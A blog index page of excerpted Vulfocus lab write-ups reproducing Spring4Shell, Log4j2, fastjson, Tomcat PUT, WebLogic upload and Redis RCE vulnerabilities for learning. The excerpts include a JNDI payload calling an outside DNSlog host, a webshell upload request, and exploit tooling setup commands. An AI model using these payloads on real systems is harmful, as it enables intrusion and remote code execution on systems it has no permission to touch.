vulfocus漏洞复现
青果@
记录一下学习历程
展开
-
【Vulfocus漏洞复现】spring-core-rce-2022-03-29
2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。漏洞利用条件1、A原创 2022-04-15 13:58:26 · 5078 阅读 · 0 评论 -
【Vulfocus漏洞复现】log4j2-cve-2021-44228
vps:centos8 腾讯云本地:windows11靶场环境:http://123.58.236.76:64936/访问靶场环境http://123.58.236.76:64936/点击???burp抓包,DNSlog验证漏洞是否存在构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400payload=${jndi:ldap://7272sq.ceye.io}对payload进行url编码(burp自带),再次进行请求,原创 2022-04-13 15:56:06 · 3907 阅读 · 0 评论 -
【Vulfocus漏洞复现】fastjson-cnvd_2017_02833、fastjson-cnvd_2019_22238
vps:centos8 腾讯云本地:windows11靶场环境:http://123.58.236.76:24477/访问靶场环境:http://123.58.236.76:24477/burp进行抓包,将请求方式改为POST,能够请求json数据,可能存在fastjson漏洞准备两个东西:Exploit.class、marshalsec-0.0.3-SNAPSHOT-all.jar(准备过程不详述,网上都有)在本地创建Exploit.java,内容如下import java.io.Buf原创 2022-04-12 17:22:08 · 4322 阅读 · 0 评论 -
【Vulfocus漏洞复现】tomcat-cve_2017_12615
访问目标http://123.58.236.76:15450/burp抓包修改请求方式为PUT,增加POST请求体PUT /shell.jsp/ HTTP/1.1Host: 123.58.236.76:15450Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like原创 2022-04-07 15:37:54 · 434 阅读 · 0 评论 -
【Vulfocus漏洞复现】weblogic-cve_2018_2894
漏洞描述WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do影响范围weblogic 10.3.6.0weblogic 12.1.3.0weblogic 12.2.1.2weblogic 12.2.1.3漏洞复现访问靶场http://123.58.236.76:61812/console/login/LoginForm.jsp访问漏洞利用点/ws_utc/confi原创 2022-04-02 17:39:52 · 2194 阅读 · 0 评论 -
【Vulfocus漏洞复现】redis-cnvd_2019_21763、redis-cnvd_2015_07557
vps:腾讯云 centos8本地:windows11靶场环境:http://123.58.236.76:47109/在vps上执行以下命令git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommandcd RedisModules-ExecuteCommand/make编译之后继续执行命令git clone https://github.com/Ridter/redis-rce.gitcd redis-rce/原创 2022-04-02 16:22:26 · 3734 阅读 · 6 评论